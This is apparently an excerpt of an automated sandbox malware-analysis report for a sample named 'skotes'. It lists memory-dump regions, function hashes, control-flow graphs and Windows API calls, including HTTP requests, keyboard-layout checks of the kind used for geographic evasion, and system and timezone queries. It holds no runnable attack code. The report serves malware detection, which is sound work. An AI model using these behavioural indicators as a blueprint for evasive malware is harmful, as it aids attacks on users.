• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
• String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$invalid stoi argument$stoi argument out of range
• API String ID: 1439999335-885246636
• Opcode ID: d404ea9c636f7c605c54a1dc86278e3f6ef94298add13a8f1a2eaa21f2708f2c
• Instruction ID: b5cb5983320d8a9066c189b6edfd12524145e77465a747fbdb251df8f8fe6b3f
• Opcode Fuzzy Hash: d404ea9c636f7c605c54a1dc86278e3f6ef94298add13a8f1a2eaa21f2708f2c
• Instruction Fuzzy Hash: A2B1D2B1A001189BDF28DF28CC84BAEBB6AEF45314F50419DF509976C2DB719AC4CF99

Control-flow Graph
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0069617D
• RegEnumValueA.KERNEL32(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 00696271
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: EnumOpenValue
• String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
• API String ID: 2571532894-3963862150
• Opcode ID: 56496af0fd4e6e6cbdfe0fc47b34a8f6eb1d58004326955dfc0130c808ec3163
• Instruction ID: 173d6680a03a44fb34fcc74bebcd0223119e6e8f641994e2fc1456898f72680c
• Opcode Fuzzy Hash: 56496af0fd4e6e6cbdfe0fc47b34a8f6eb1d58004326955dfc0130c808ec3163
• Instruction Fuzzy Hash: 1CB1C0719002689BDF24DB64CC84BDEB7BAAF05340F4442D9F108E7691DB74AFA88F94

Control-flow Graph
APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00697ED3
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
• API String ID: 1721193555-3123340372
• Opcode ID: beb85c206dd3e3a1a1573119171d2f64509de3e55cc8fe4d8b76bc9498f44841
• Instruction ID: 7affea2304d22e57025cea4810364e26f6c7be7dee0fe06007b78cd5887f28cd
• Opcode Fuzzy Hash: beb85c206dd3e3a1a1573119171d2f64509de3e55cc8fe4d8b76bc9498f44841
• Instruction Fuzzy Hash: 30E12870E002449BDF15BB68CC1B3AD7B67AB42720F94028CE4166B7C2DB758F918BC6

Control-flow Graph
control_flow_graph 1979 6d1abc-6d1aec call 6d180a 1982 6d1aee-6d1af9 call 6c75e3 1979->1982 1983 6d1b07-6d1b13 call 6cbf3a 1979->1983 1988 6d1afb-6d1b02 call 6c75f6 1982->1988 1989 6d1b2c-6d1b75 call 6d1775 1983->1989 1990 6d1b15-6d1b2a call 6c75e3 call 6c75f6 1983->1990 1997 6d1de1-6d1de5 1988->1997 1999 6d1b77-6d1b80 1989->1999 2000 6d1be2-6d1beb GetFileType 1989->2000 1990->1988 2004 6d1bb7-6d1bdd call 6c75c0 1999->2004 2005 6d1b82-6d1b86 1999->2005 2001 6d1bed-6d1c1e call 6c75c0 2000->2001 2002 6d1c34-6d1c37 2000->2002 2001->1988 2026 6d1c24-6d1c2f call 6c75f6 2001->2026 2007 6d1c39-6d1c3e 2002->2007 2008 6d1c40-6d1c46 2002->2008 2004->1988 2005->2004 2006 6d1b88-6d1bb5 call 6d1775 2005->2006 2006->2000 2006->2004 2010 6d1c4a-6d1c98 call 6cbe85 2007->2010 2008->2010 2012 6d1c48 2008->2012 2021 6d1c9a-6d1ca6 call 6d1984 2010->2021 2022 6d1cb7-6d1cdf call 6d1522 2010->2022 2012->2010 2021->2022 2032 6d1ca8 2021->2032 2030 6d1ce4-6d1d25 2022->2030 2031 6d1ce1-6d1ce2 2022->2031 2026->1988 2035 6d1d27-6d1d2b 2030->2035 2036 6d1d46-6d1d54 2030->2036 2034 6d1caa-6d1cb2 call 6caf48 2031->2034 2032->2034 2034->1997 2035->2036 2037 6d1d2d-6d1d41 2035->2037 2038 6d1ddf 2036->2038 2039 6d1d5a-6d1d5e 2036->2039 2037->2036 2038->1997 2039->2038 2042 6d1d60-6d1d93 call 6d1775 2039->2042 2046 6d1d95-6d1dc1 call 6c75c0 call 6cc04d 2042->2046 2047 6d1dc7-6d1ddb 2042->2047 2046->2047 2047->2038
APIs
• Part of subcall function 006D1775: CreateFileW.KERNEL32(00000000,00000000,?,006D1B65,?,?,00000000,?,006D1B65,00000000,0000000C), ref: 006D1792
• __dosmaperr.LIBCMT ref: 006D1BD7
• GetFileType.KERNEL32(00000000), ref: 006D1BE3
• __dosmaperr.LIBCMT ref: 006D1BF6
• __dosmaperr.LIBCMT ref: 006D1D9C
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: __dosmaperr$File$CreateType
• String ID: H
• API String ID: 3443242726-2852464175
• Opcode ID: ef9b1c0fb60b4906c1735fd06f5fca3a6dedf76a9669aa390992b4eb616d9c0c
• Instruction ID: 08b327a59d4d73a7b139725971a6e47751f813552d0347311582286318325e07
• Opcode Fuzzy Hash: ef9b1c0fb60b4906c1735fd06f5fca3a6dedf76a9669aa390992b4eb616d9c0c
• Instruction Fuzzy Hash: C8A10632E141486FCF199F68C951BAE3BA2DB0B320F24018EF851AF391DB759D12CB55

Control-flow Graph (interactive graph for the function starting at 6d26f2; not reproduced in text)
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,006E6758), ref: 006D275C
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InformationTimeZone
                                                                                                                                                                                                                                          • String ID: Eastern Standard Time$Eastern Summer Time$Xgn
                                                                                                                                                                                                                                          • API String ID: 565725191-2117068305
                                                                                                                                                                                                                                          • Opcode ID: 90fcd1c4f7a137f24241bbcdbd721bfb0bc106bed6a09718417cf062001a749a
                                                                                                                                                                                                                                          • Instruction ID: 4db4e0217f8d41ac968fcd2e4ad18eab9195c06af3ca9d7cd1fc1e19b13fe7c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90fcd1c4f7a137f24241bbcdbd721bfb0bc106bed6a09718417cf062001a749a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC51E372D0021AABDB20AF69CC919BA77BBEF65320B10416FF520A3391E7309E45DB54

Control-flow Graph
Basic blocks listed as "id address-range [APIs / sub-calls] -> successor ids", in address order; a block with no successors has no outgoing edge in the dump:
• 2281 6c6fb4-6c6fe9 GetFileType -> 2282, 2283
• 2282 6c6fef-6c6ffa -> 2284, 2285
• 2285 6c6ffc-6c700d call 6c732a -> 2299, 2300
• 2300 6c7013-6c701a -> 2284
• 2284 6c701c-6c7038 call 6c40f0, GetFileInformationByHandle -> 2296, 2302
• 2302 6c703e-6c7080 call 6c727c, call 6c7124 * 3 -> 2317
• 2317 6c7085-6c709d call 6c7249 -> 2289, 2320
• 2320 6c709f -> 2299
• 2283 6c70a1-6c70a4 -> 2286, 2287
• 2287 6c70a6-6c70a9 -> 2286, 2292
• 2292 6c70ab-6c70ad -> 2296, 2297
• 2297 6c70af-6c70b4 call 6c75f6 -> 2299
• 2299 6c70ba-6c70bc -> 2294
• 2296 6c70be-6c70cb call 6c75c0 -> 2299
• 2286 6c70cd-6c70f5 -> 2288, 2289
• 2288 6c70f7-6c710a -> 2289, 2305
• 2305 6c710c-6c710f -> 2289
• 2289 6c7112-6c7114 -> 2294
• 2294 6c7115-6c7123 call 6acff1
APIs
• GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,006C6EE6), ref: 006C6FD6
• GetFileInformationByHandle.KERNEL32(?,?), ref: 006C7030
• __dosmaperr.LIBCMT ref: 006C70C5
  • Part of subcall function 006C732A: __dosmaperr.LIBCMT ref: 006C735F
Strings
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: File__dosmaperr$HandleInformationType
• String ID: nl
• API String ID: 2531987475-1531707334
• Opcode ID: 86f9b8ffcf67caec2989078c2a847a15e451043f2ef0d08084acfec419729484
